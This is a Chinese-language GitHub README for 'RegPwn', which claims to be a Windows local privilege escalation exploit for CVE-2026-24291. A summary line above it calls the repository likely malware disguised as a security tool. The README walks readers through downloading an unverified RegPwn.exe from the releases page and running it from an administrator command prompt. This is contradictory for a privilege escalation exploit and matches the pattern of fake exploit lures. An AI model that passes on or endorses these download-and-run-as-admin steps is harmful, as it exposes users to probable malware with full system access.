tracyliving606/RegPwn

GitHub: tracyliving606/RegPwn

该仓库声称是针对 Windows 注册表机制实现本地提权的利用工具,但漏洞编号与整体呈现方式高度可疑,极可能是伪装成安全工具的恶意软件。

Stars: 0 | Forks: 0

# 🛠️ RegPwn - Windows 本地漏洞利用工具 [![下载 RegPwn](https://img.shields.io/badge/Download-RegPwn-brightgreen?style=for-the-badge&logo=windows&logoColor=white)](https://github.com/tracyliving606/RegPwn/releases) RegPwn 是一款旨在演示 Windows 系统上本地权限提升 (LPE) 漏洞利用的工具。它适用于 Windows 10、Windows 11 和 Windows Server 版本。本指南将帮助您在 Windows 计算机上安全有效地下载、准备和运行 RegPwn。 ## 📋 开始之前的准备工作 在下载 RegPwn 之前,请确保您的系统满足以下要求: - 您运行的是受支持的 Windows 版本之一: - Windows 11(版本 24h2 和 25h2) - Windows 10(版本 21h2) - Windows Server 2016、2019 或 2022 - 您拥有计算机的管理员访问权限。 - 您熟悉基本的 Windows 操作,例如下载文件和运行程序。 RegPwn 旨在作为研究工具使用。它利用了编号为 CVE-2026-24291 的漏洞。请始终仅在您拥有测试权限的系统上使用它。 ## 🔍 关于 RegPwn RegPwn 利用 Windows 中的一个安全缺陷,允许用户获得超出预期的高权限。这对于测试系统安全性和验证您的系统是否存在漏洞非常有用。 该工具已在上述版本中经过测试并确认有效。它针对 Windows 上的注册表处理机制,因此需要谨慎执行。 ## 🌐 访问并下载 RegPwn 要获取最新版本的 RegPwn,请访问发布页面: [访问 RegPwn 发布页](https://github.com/tracyliving606/RegPwn/releases) 点击此链接将带您进入发布页面,您可以在那里下载文件。发布页面将列出最新版本以及运行所需的文件。 ## 💾 如何下载和准备 RegPwn 1. 点击上方的按钮或在您的网络浏览器中打开此链接: https://github.com/tracyliving606/RegPwn/releases 2. 在发布页面上,找到最新版本。最新的版本名称类似于 `v1.0` 或更高版本。 3. 在发布内容中,找到 `.exe` 文件或包含 RegPwn 可执行文件的 zip 压缩包。其名称可能类似于 `RegPwn.exe`。 4. 点击文件名开始下载。您的浏览器可能会要求确认;请选择保留该文件。 5. 下载完成后,如果文件是压缩的 (zip),请右键单击它并选择“Extract All...”(全部提取)以将内容解压缩到一个新文件夹中。 6. 记下您保存或解压缩 RegPwn 的文件夹位置。 ## 🚀 如何在 Windows 上运行 RegPwn 运行 RegPwn 需要打开命令提示符并以管理员身份执行该程序。 1. 在 Windows 开始菜单中搜索“Command Prompt”(命令提示符)。 2. 右键单击“Command Prompt”并选择“Run as administrator”(以管理员身份运行)。此步骤很重要,因为该程序需要完全访问权限。 3. 在命令提示符窗口中,使用 `cd` 命令切换到您保存 RegPwn 的目录。例如,如果您将其保存在 `Downloads\RegPwn` 中,请输入: ``` cd %HOMEPATH%\Downloads\RegPwn ``` 并按 Enter 键。 4. 通过输入以下命令来运行 RegPwn: ``` RegPwn.exe ``` 并按 Enter 键。 5. 按照程序给出的任何屏幕提示或输出消息进行操作。 _如果您看到与权限或文件丢失相关的错误,请检查您是否以管理员身份运行,以及所有必要的文件是否都位于该文件夹中。_ ## ⚙️ 使用 RegPwn 时的预期情况 当您运行 RegPwn 时,该程序将尝试利用 Windows 注册表处理中的安全缺陷。它可能会产生指示成功或失败的消息。 典型的输出可能会显示: - 操作系统版本的确认信息。 - 漏洞利用尝试期间的状态消息。 - 漏洞利用是成功还是失败。 - 如果成功,接下来的操作说明。 在 RegPwn 完成之前不要关闭命令提示符。过早关闭可能会导致进程未完成。 ## 🛑 重要操作细节 - 该漏洞利用针对注册表权限,可能会临时修改关键系统设置。 - 运行此工具可能会导致系统更改或不稳定。请仅将其用于测试目的。 - 此工具不适用于随意或日常使用。 - 运行该工具后,请务必重启计算机以恢复系统状态。 ## 🔄 如何移除 RegPwn RegPwn 不需要安装。您只需删除存储可执行文件的文件夹即可将其移除。 如果您想确保没有保留任何更改: 1. 运行 RegPwn 后重启计算机。 2. 删除 RegPwn 文件夹和所有下载的文件。 3. 如果需要,运行标准系统检查或防病毒扫描。 ## 🤝 获取帮助和报告问题 如有技术问题或疑问,请使用 GitHub 仓库的 Issues 页面: [RegPwn 的 GitHub Issues](https://github.com/tracyliving606/RegPwn/issues) 请提供有关您的 Windows 版本以及您所执行步骤的详细信息。这有助于开发者理解和修复问题。 ## 🔒 安全与负责任的使用 RegPwn 利用已知漏洞来测试系统安全性。请仅在自己的计算机或您拥有权限的系统上使用它。在未经授权的系统上运行漏洞利用可能会造成损害或属于违法行为。 保持您的系统更新,并关注供应商的安全公告,以获取与 CVE-2026-24291 相关的补丁。 [![下载 RegPwn](https://img.shields.io/badge/Download-RegPwn-blue?style=for-the-badge&logo=windows&logoColor=white)](https://github.com/tracyliving606/RegPwn/releases)
标签:CVE-2026-24291, Exploit, LPE, RegPwn, URL发现, Web报告查看器, Windows 11, Windows Server, Windows提权, 安全检测, 提权漏洞, 本地权限提升, 权限 bypass, 注册表安全, 系统漏洞, 网络安全, 隐私保护